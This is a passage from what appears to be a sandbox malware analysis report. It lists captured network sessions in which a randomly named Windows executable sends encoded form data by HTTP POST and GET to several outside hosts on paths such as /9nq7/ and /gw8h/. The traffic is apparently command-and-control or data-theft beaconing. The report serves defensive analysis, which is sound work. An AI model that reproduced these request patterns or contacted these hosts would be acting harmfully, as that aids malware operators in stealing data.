                Data Raw: 4c 74 51 78 47 46 3d 36 55 7a 35 53 62 4e 51 73 55 65 6b 45 47 4d 4f 6a 79 6a 6a 4d 55 6c 4d 68 58 4b 36 4c 5a 72 34 6e 71 62 53 79 52 53 4e 33 44 4f 4d 34 47 4c 4e 58 6f 76 5a 71 42 70 33 64 76 63 56 64 4d 4d 56 64 39 69 58 66 41 62 44 65 68 42 6f 31 54 69 32 33 31 2b 4c 6c 78 77 33 46 56 59 63 39 72 39 79 66 43 59 53 66 50 41 44 53 33 2b 79 5a 4e 31 78 78 37 78 30 41 6a 33 33 76 71 72 71 6a 2f 46 36 38 34 65 48 62 75 43 49 45 44 73 69 6e 70 37 55 45 43 31 6d 73 74 77 47 72 45 34 62 45 49 41 50 7a 67 4d 51 59 6f 59 79 55 5a 37 59 51 34 6c 58 30 6d 2f 41 52 42 63 7a 67 44 4d 43 34 76 57 7a 50 67 3d 3d
                Data Ascii: LtQxGF=6Uz5SbNQsUekEGMOjyjjMUlMhXK6LZr4nqbSyRSN3DOM4GLNXovZqBp3dvcVdMMVd9iXfAbDehBo1Ti231+Llxw3FVYc9r9yfCYSfPADS3+yZN1xx7x0Aj33vqrqj/F684eHbuCIEDsinp7UEC1mstwGrE4bEIAPzgMQYoYyUZ7YQ4lX0m/ARBczgDMC4vWzPg==
                Jul 4, 2024 12:37:13.551486015 CEST872INHTTP/1.1 200 OK
                Server: openresty/1.13.6.1
                Date: Thu, 04 Jul 2024 10:37:13 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Content-Encoding: gzip
                Data Raw: 32 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 cb 72 da 30 14 40 f7 fd 0a d7 8b 4c 3b 53 f0 0b 02 6e ec 74 12 02 c4 c4 40 9a 10 0c de 64 64 49 41 02 59 72 b0 8c 21 9d fe 7b 8d 61 02 2d d9 54 0b 4b f7 ea 3e 8f 64 39 9f 6f 86 ad d1 f4 be ad 10 19 b3 cb 4f ce 76 52 18 e0 33 57 c5 5c bd fc a4 14 c3 21 18 a0 dd b2 14 63 2c 81 02 09 58 a6 58 ba ea d3 a8 53 69 ee 2d 0f db 44 ca a4 82 5f 33 ba 72 d5 75 25 03 15 28 e2 04 48 1a 31 ac 2a 50 70 89 79 e1 eb b5 5d 8c 66 f8 c4 9b 83 18 bb ea 8a e2 3c 11 4b 79 e4 90 53 24 89 8b f0 8a 42 5c 29 85 6f 0a e5 54 52 c0 2a 29 04 0c bb 46 55 3f 0e 27 a9 64 f8 d2 d1 76 73 d9 4e 59 24 17 29 5c d2 44 1e da fa b8 f6 25 7e 59 e2 94 1c 95 a0 5f 64 4b e6 6e fb fb ae 69 79 9e 37 f4 2a 2c 00 25 08 a7 0b 06 e2 a4 9a 12 91 68 aa a2 1d 42 3b da 69 3a a7 a4 78 8c e9 34 55 fd ff 52 39 da e1 a0 9c 48 a0 8d 22 38 13 00 b9 2a 12 cf bb e5 97 af c7 70 76 08 14 b9 49 0a da 12 af a5 36 07 2b b0 d3 1e d9 6d c9 bc 64 1c 4a 2a b8 72 14 4a f9 f5 ce 73 6b b2 1d 39 e5 48 e4 55 29 92 2a 13 b0 38 [TRUNCATED]
                Data Ascii: 2a8r0@L;Snt@ddIAYr!{a-TK>d9oOvR3W\!c,XXSi-D_3ru%(H1*Ppy]f<KyS$B\)oTR*)FU?'dvsNY$)\D%~Y_dKniy7*,%hB;i:x4UR9H"8*pvI6+mdJ*rJsk9HU)*8ohLq#`6m%q6OOQSvvC7:ogB|YMXG+:8x^+epcnu=n!m,?0aw5&W4-oPw\C-[NdjvtoRg^ e(p|QO$LBNG^wf'bjVvsf-@L:G|73o^77{`N/GcV/%G;m{CG+_?80


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                14192.168.2.460633194.195.220.41802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:15.560389996 CEST797OUTPOST /9nq7/ HTTP/1.1
                Host: www.cheapdesklamp.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.cheapdesklamp.shop
                Connection: close
                Content-Length: 223
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.cheapdesklamp.shop/9nq7/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 36 55 7a 35 53 62 4e 51 73 55 65 6b 43 6c 45 4f 7a 68 37 6a 4a 30 6c 50 39 6e 4b 36 42 35 71 2f 6e 71 6e 53 79 55 71 64 77 77 71 4d 39 55 44 4e 57 71 48 5a 70 42 70 33 54 50 64 65 53 73 4d 65 64 39 75 31 66 42 6e 44 65 68 46 6f 31 57 65 32 32 48 57 49 6b 68 77 78 51 46 59 6b 77 4c 39 79 66 43 59 53 66 50 55 6c 53 7a 53 79 5a 2b 64 78 79 61 78 37 4a 44 33 34 6d 4b 72 71 6e 2f 46 2b 38 34 65 6c 62 76 66 6a 45 41 55 69 6e 72 6a 55 46 58 5a 6c 6c 74 77 63 32 55 35 52 58 4a 70 7a 2b 56 70 36 66 4f 55 37 59 6f 66 30 63 65 30 4e 6c 58 65 58 44 42 34 41 39 45 46 32 31 73 72 36 55 6e 61 55 56 35 76 68 6c 70 6e 73 33 6f 41 43 53 45 61 69 38 36 30 3d
                Data Ascii: LtQxGF=6Uz5SbNQsUekClEOzh7jJ0lP9nK6B5q/nqnSyUqdwwqM9UDNWqHZpBp3TPdeSsMed9u1fBnDehFo1We22HWIkhwxQFYkwL9yfCYSfPUlSzSyZ+dxyax7JD34mKrqn/F+84elbvfjEAUinrjUFXZlltwc2U5RXJpz+Vp6fOU7Yof0ce0NlXeXDB4A9EF21sr6UnaUV5vhlpns3oACSEai860=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                15192.168.2.460634194.195.220.41802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:18.137794971 CEST10879OUTPOST /9nq7/ HTTP/1.1
                Host: www.cheapdesklamp.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.cheapdesklamp.shop
                Connection: close
                Content-Length: 10303
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.cheapdesklamp.shop/9nq7/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 36 55 7a 35 53 62 4e 51 73 55 65 6b 43 6c 45 4f 7a 68 37 6a 4a 30 6c 50 39 6e 4b 36 42 35 71 2f 6e 71 6e 53 79 55 71 64 77 77 69 4d 39 42 58 4e 51 4c 48 5a 6f 42 70 33 4d 2f 63 5a 53 73 4d 35 64 39 32 78 66 42 72 54 65 69 78 6f 6e 6b 6d 32 2b 54 43 49 74 68 77 78 50 31 59 66 39 72 38 6f 66 43 70 61 66 50 45 6c 53 7a 53 79 5a 37 5a 78 6c 62 78 37 46 6a 33 33 76 71 72 6d 6a 2f 46 53 38 35 36 66 62 76 71 59 45 78 30 69 2b 49 62 55 49 46 68 6c 71 74 77 61 31 55 34 45 58 4a 31 57 2b 52 4a 63 66 4f 49 43 59 72 44 30 4d 34 31 30 78 7a 53 4c 51 67 46 66 76 31 39 47 73 38 48 63 64 78 36 6e 65 71 76 4f 6e 34 4c 49 35 36 46 50 48 6e 61 4a 69 38 36 35 36 71 71 41 56 52 78 77 4b 67 38 73 58 79 66 63 7a 69 76 66 63 32 6e 62 5a 73 43 69 4f 6d 7a 64 2b 7a 77 48 4c 34 42 79 32 2f 34 75 67 76 73 46 73 78 65 49 6e 78 76 6e 70 79 4b 6e 76 4f 50 56 53 75 2b 59 74 55 2f 64 45 35 72 72 59 79 4a 78 68 2f 61 53 61 4c 38 73 34 2f 7a 34 78 64 52 74 64 54 67 6b 61 42 38 78 51 4f 42 5a 63 4f 35 77 56 4a 33 [TRUNCATED]
                Data Ascii: LtQxGF=6Uz5SbNQsUekClEOzh7jJ0lP9nK6B5q/nqnSyUqdwwiM9BXNQLHZoBp3M/cZSsM5d92xfBrTeixonkm2+TCIthwxP1Yf9r8ofCpafPElSzSyZ7Zxlbx7Fj33vqrmj/FS856fbvqYEx0i+IbUIFhlqtwa1U4EXJ1W+RJcfOICYrD0M410xzSLQgFfv19Gs8Hcdx6neqvOn4LI56FPHnaJi8656qqAVRxwKg8sXyfczivfc2nbZsCiOmzd+zwHL4By2/4ugvsFsxeInxvnpyKnvOPVSu+YtU/dE5rrYyJxh/aSaL8s4/z4xdRtdTgkaB8xQOBZcO5wVJ3si9WbFjnxR1G5i6qb4Ac19mB/yEJEiJstQmB5AuajVRsdo8LM1YD/Fn6weNfDuzIIYMgPmi4n4XRE710xmEi49Qcwho04jvwF2ARUSyaiRHtJtN1+lkTa972PwyXErQJohk7zjecW5mXzRqkwmZpu1f582RfIcifY6ZkfiJWaSQuXjBmqVboTeG0ZS9MutAOzcP22ZvOzcXmMoPdUh1Wsdsd1kzGNW4On8z/jXTu5S0mcDfkQlzgm+vTSzfsyY8ED8cV+AD0dPpvM1mnrUZFtX1bzYXLGf33wMpffuxPsSYR59xAmwGLJpg+OsqBoE3JKY+jfNbNktf79yi8y0g4IQQ83hqhbQa+bAKodxuz1YMaPMMpigQU+5wIp5Yt8jvtfQhYkkbz2Fzs+abdQj0nCa0WPnQxgc4P1MMkmA5aRNWT/zZq33+Fq+mGvuV3lb57W6MvSCGZesNWvwUg37jFfhXvUNze4oswjf4UN2qq2mllMiqfTC8yc1gLCAXdeXO5aE4EXkMzFBG5YWk6bZdItMpocNJL2aDNrvx19Bu8s7qgHVtvSMwUddgLoVvZGSF8TQOQNn+dMqzdwfYUnbxfCWuaL4AiPbP0JEo+6sKciaKoyVDi/MUukdsnKbsstIJb2i36WCW2gW7/jJ94+meNrXA8yqfMG/oGA+ [TRUNCATED]


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                16192.168.2.460635194.195.220.41802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:20.644937038 CEST495OUTGET /9nq7/?LtQxGF=3WbZRu4mrDqEA1Ay7ye2LS4QzFLdLuukgLPU+Ee+5nDYiFfgQ/T3sQVzU9oLEM0lY8+GADXgUVgfoHaw0lWmg2ENHn4ynM4ZVTokb9t9TCHuPL1ipqofA3g=&tDVH=AxaL HTTP/1.1
                Host: www.cheapdesklamp.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                17192.168.2.460636162.0.236.122802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:25.721255064 CEST756OUTPOST /gw8h/ HTTP/1.1
                Host: www.tofcomy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.tofcomy.xyz
                Connection: close
                Content-Length: 203
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.tofcomy.xyz/gw8h/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 2b 45 46 59 2b 39 41 41 6d 53 79 58 4b 6c 54 49 6f 57 4b 6f 78 2b 57 6f 4b 6f 44 6d 76 32 64 34 6d 7a 68 51 37 43 73 6b 39 6d 43 70 65 45 55 70 77 4c 4f 4d 34 72 6c 4a 54 5a 71 56 74 33 71 72 63 51 70 61 68 76 6e 44 47 6c 53 59 77 79 53 42 72 4f 72 33 57 47 78 59 4a 56 4a 52 66 52 77 37 6f 38 71 35 5a 59 2f 48 2b 55 79 66 38 66 59 4d 4a 70 52 42 38 6e 72 35 50 50 4f 5a 32 4f 64 39 46 76 4f 44 79 53 54 2f 4f 6e 51 79 49 68 63 5a 77 4f 53 67 5a 7a 47 35 4a 65 54 41 4d 30 69 74 2b 69 63 4d 62 74 43 66 55 4e 2f 77 63 49 64 31 56 43 2f 37 73 44 57 48 4c 39 68 2f 6c 67 63 64 6a 51 3d 3d
                Data Ascii: LtQxGF=+EFY+9AAmSyXKlTIoWKox+WoKoDmv2d4mzhQ7Csk9mCpeEUpwLOM4rlJTZqVt3qrcQpahvnDGlSYwySBrOr3WGxYJVJRfRw7o8q5ZY/H+Uyf8fYMJpRB8nr5PPOZ2Od9FvODyST/OnQyIhcZwOSgZzG5JeTAM0it+icMbtCfUN/wcId1VC/7sDWHL9h/lgcdjQ==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                18192.168.2.460637162.0.236.122802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:28.307761908 CEST776OUTPOST /gw8h/ HTTP/1.1
                Host: www.tofcomy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.tofcomy.xyz
                Connection: close
                Content-Length: 223
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.tofcomy.xyz/gw8h/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 2b 45 46 59 2b 39 41 41 6d 53 79 58 4c 45 6a 49 76 78 65 6f 36 2b 57 72 55 34 44 6d 6c 57 64 38 6d 7a 6c 51 37 44 6f 4f 36 55 57 70 65 6d 63 70 7a 4b 4f 4d 37 72 6c 4a 48 4a 72 66 6a 58 71 69 63 51 56 6f 68 72 6e 44 47 6c 57 59 77 33 75 42 72 34 6a 30 58 57 78 61 50 56 4a 66 43 42 77 37 6f 38 71 35 5a 59 72 74 2b 55 71 66 2f 73 77 4d 4a 4e 4e 4f 69 58 72 36 49 50 4f 5a 79 4f 64 35 46 76 4f 68 79 58 4b 53 4f 68 63 79 49 67 73 5a 7a 66 53 6a 4d 6a 47 37 48 2b 53 73 4e 32 79 6d 30 48 31 63 47 64 76 39 54 63 6a 50 64 4f 4d 76 45 7a 65 73 2b 44 79 30 57 36 6f 4c 6f 6a 68 55 34 51 75 52 51 6e 5a 58 4a 7a 2f 66 72 35 37 41 50 59 71 34 31 33 4d 3d
                Data Ascii: LtQxGF=+EFY+9AAmSyXLEjIvxeo6+WrU4DmlWd8mzlQ7DoO6UWpemcpzKOM7rlJHJrfjXqicQVohrnDGlWYw3uBr4j0XWxaPVJfCBw7o8q5ZYrt+Uqf/swMJNNOiXr6IPOZyOd5FvOhyXKSOhcyIgsZzfSjMjG7H+SsN2ym0H1cGdv9TcjPdOMvEzes+Dy0W6oLojhU4QuRQnZXJz/fr57APYq413M=
                Jul 4, 2024 12:37:28.941060066 CEST1236INHTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:28 GMT
                Server: Apache
                Content-Length: 1414
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 79 74 64 34 69 6e 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 74 72 79 7b 54 79 70 65 6b 69 74 2e 6c 6f 61 64 28 7b 20 61 73 79 6e 63 3a 20 74 72 75 65 20 7d 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Page </title> <script src="https://use.typekit.net/ytd4ine.js"></script><script>try{Typekit.load({ async: true });}catch(e){}</script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><main> <div> <div> <span>404&nbsp;error</span> <span>page&nbsp;not&nbsp;found</span> </div> <svg viewBox='0 0 200 600'> <polygon points='118.302698 8 59.5369448 66.7657528 186.487016 193.715824 14 366.202839 153.491505 505.694344 68.1413353 591.044514 200 591.044514 200 8'></polygon> </svg> </div> <svg class='crack' viewBox='0 0 200 600'> <polyline points='118.302698 8 59.5369448 66.7657528 186.487016 193.715824 14 366.202839 153.491505 505.694344 68.1413353 591.044514'></polyline> </svg> <div> <svg viewBox='0 0 200 600'> <polygon points [TRUNCATED]
                Jul 4, 2024 12:37:28.941147089 CEST323INData Raw: 31 35 30 35 20 35 30 35 2e 36 39 34 33 34 34 20 36 38 2e 31 34 31 33 33 35 33 20 35 39 31 2e 30 34 34 35 31 34 20 30 20 35 39 31 2e 30 34 34 35 31 34 20 30 20 38 27 3e 3c 2f 70 6f 6c 79 67 6f 6e 3e 0a 20 20 20 20 3c 2f 73 76 67 3e 0a 20 20 20 20
                Data Ascii: 1505 505.694344 68.1413353 591.044514 0 591.044514 0 8'></polygon> </svg> <div> <span>sorry&nbsp;about&nbsp;that!</span> <span> <a> <b>return&nbsp;home?</b> </a> </span> </div> </div><


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                19192.168.2.460638162.0.236.122802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:30.842369080 CEST10858OUTPOST /gw8h/ HTTP/1.1
                Host: www.tofcomy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.tofcomy.xyz
                Connection: close
                Content-Length: 10303
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.tofcomy.xyz/gw8h/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 2b 45 46 59 2b 39 41 41 6d 53 79 58 4c 45 6a 49 76 78 65 6f 36 2b 57 72 55 34 44 6d 6c 57 64 38 6d 7a 6c 51 37 44 6f 4f 36 55 4f 70 65 54 51 70 78 70 57 4d 36 72 6c 4a 62 35 72 63 6a 58 72 79 63 51 4e 73 68 71 62 54 47 6e 65 59 77 56 32 42 74 4e 44 30 64 57 78 61 4e 56 4a 65 66 52 77 75 6f 38 36 39 5a 59 37 74 2b 55 71 66 2f 70 30 4d 65 4a 52 4f 67 58 72 35 50 50 4f 56 32 4f 64 42 46 76 48 57 79 54 58 76 4e 52 38 79 49 41 38 5a 67 64 4b 6a 4e 44 47 39 41 2b 53 30 4e 32 2f 2b 30 44 74 51 47 64 71 51 54 63 48 50 66 34 64 4d 55 51 6d 6b 6f 41 61 78 4c 59 67 4b 78 45 52 31 38 68 6e 6c 63 58 42 67 54 6e 6a 51 78 4c 57 30 53 5a 71 47 6a 42 6a 73 47 61 30 4e 50 71 50 49 55 71 32 76 32 66 69 4c 73 45 6c 6e 71 32 4a 42 39 6d 72 56 61 75 70 44 64 30 55 42 49 52 71 77 55 64 52 4f 73 57 36 77 31 31 74 43 56 33 32 4b 42 5a 75 6b 64 6f 39 42 4c 52 6e 4f 59 47 59 62 4d 65 48 61 41 41 32 79 39 6c 68 4d 67 6a 61 62 52 79 70 73 73 50 38 42 77 32 46 6f 63 69 42 45 53 43 37 4f 67 43 75 44 72 69 4a [TRUNCATED]
                Data Ascii: LtQxGF=+EFY+9AAmSyXLEjIvxeo6+WrU4DmlWd8mzlQ7DoO6UOpeTQpxpWM6rlJb5rcjXrycQNshqbTGneYwV2BtND0dWxaNVJefRwuo869ZY7t+Uqf/p0MeJROgXr5PPOV2OdBFvHWyTXvNR8yIA8ZgdKjNDG9A+S0N2/+0DtQGdqQTcHPf4dMUQmkoAaxLYgKxER18hnlcXBgTnjQxLW0SZqGjBjsGa0NPqPIUq2v2fiLsElnq2JB9mrVaupDd0UBIRqwUdROsW6w11tCV32KBZukdo9BLRnOYGYbMeHaAA2y9lhMgjabRypssP8Bw2FociBESC7OgCuDriJcG6B3O6YfjyykrAZkRsLCc4UZsbxj235BFhdT5YNXc9O3akHIrQ+7tsxg8QKU4VJwe+127hVKXL9Wiq7r1uPl+yY56TVCEm3ip+xGWKUbFSVKiPbbuOCGsuxM7msTySnfrCDcTJ5xSDdtF6AKzbV0WAS9TBkzMHlc3pdfiqCJCtldBc9ab42dELuQPh2pZMtDT1a5TV8sHD7sUFeXpa638lCDq7gBT5lsvXtYE2dxT/tDf4kKvLDLSdTXOCCOZPhfxlXwFYSFHZN87T566bzfAqsqFWB2PYCBCU8g0eaFs4NSO9UrHYwK12TdTKCOcnt2mhPEecODnElN/Na+Y36lhERdX0AuAD3kk++2Xj9K9wSGitdpBwAwa6dzah+XTUaCaVuwO4j2b6FVx2+6x4UaP2gGUgX+RCdThBJVaaheZfRxalEvS7Mkg+TMi6AZ3NqrUf/2xIDaiEHy2yiV4Obhv8WyEOoSxLHFt6TknrUqEq/ErpWoIzCNaYZ4CkwVaYEka9Xhkk3gCVOGaQYbaB6dSI5U867hCAoP3/y9Vzo0QTjvkX5zQguXL2qNm26XXOI/MSZUUzU+KJSeoAB/f6MnwX5qi/Vk52u7t9OG8sHqSQOyQs6/QIeYgZFzh13tjC9Lv/qWR5L67P3DtfvboE9qp4U1ajmQ4FI3Z [TRUNCATED]
                Jul 4, 2024 12:37:31.488029003 CEST1236INHTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:31 GMT
                Server: Apache
                Content-Length: 1414
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 79 74 64 34 69 6e 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 74 72 79 7b 54 79 70 65 6b 69 74 2e 6c 6f 61 64 28 7b 20 61 73 79 6e 63 3a 20 74 72 75 65 20 7d 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Page </title> <script src="https://use.typekit.net/ytd4ine.js"></script><script>try{Typekit.load({ async: true });}catch(e){}</script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><main> <div> <div> <span>404&nbsp;error</span> <span>page&nbsp;not&nbsp;found</span> </div> <svg viewBox='0 0 200 600'> <polygon points='118.302698 8 59.5369448 66.7657528 186.487016 193.715824 14 366.202839 153.491505 505.694344 68.1413353 591.044514 200 591.044514 200 8'></polygon> </svg> </div> <svg class='crack' viewBox='0 0 200 600'> <polyline points='118.302698 8 59.5369448 66.7657528 186.487016 193.715824 14 366.202839 153.491505 505.694344 68.1413353 591.044514'></polyline> </svg> <div> <svg viewBox='0 0 200 600'> <polygon points [TRUNCATED]
                Jul 4, 2024 12:37:31.488044977 CEST323INData Raw: 31 35 30 35 20 35 30 35 2e 36 39 34 33 34 34 20 36 38 2e 31 34 31 33 33 35 33 20 35 39 31 2e 30 34 34 35 31 34 20 30 20 35 39 31 2e 30 34 34 35 31 34 20 30 20 38 27 3e 3c 2f 70 6f 6c 79 67 6f 6e 3e 0a 20 20 20 20 3c 2f 73 76 67 3e 0a 20 20 20 20
                Data Ascii: 1505 505.694344 68.1413353 591.044514 0 591.044514 0 8'></polygon> </svg> <div> <span>sorry&nbsp;about&nbsp;that!</span> <span> <a> <b>return&nbsp;home?</b> </a> </span> </div> </div><


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                20192.168.2.460639162.0.236.122802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:33.379559040 CEST488OUTGET /gw8h/?LtQxGF=zGt49IFm93SrBWz0hF/Exo3fFaLGg1tTuVJPwAsKzCbkUXUSx9Ko4qRJeqPE/lbiWQNCjazmLjusy2a3r/X1USIwM3t9fhEbscmQM7mJ8GSckJYgF9Mlv0Q=&tDVH=AxaL HTTP/1.1
                Host: www.tofcomy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                21192.168.2.46064052.1.217.30802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:46.701988935 CEST762OUTPOST /awho/ HTTP/1.1
                Host: www.wwfglobal.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.wwfglobal.com
                Connection: close
                Content-Length: 203
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.wwfglobal.com/awho/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
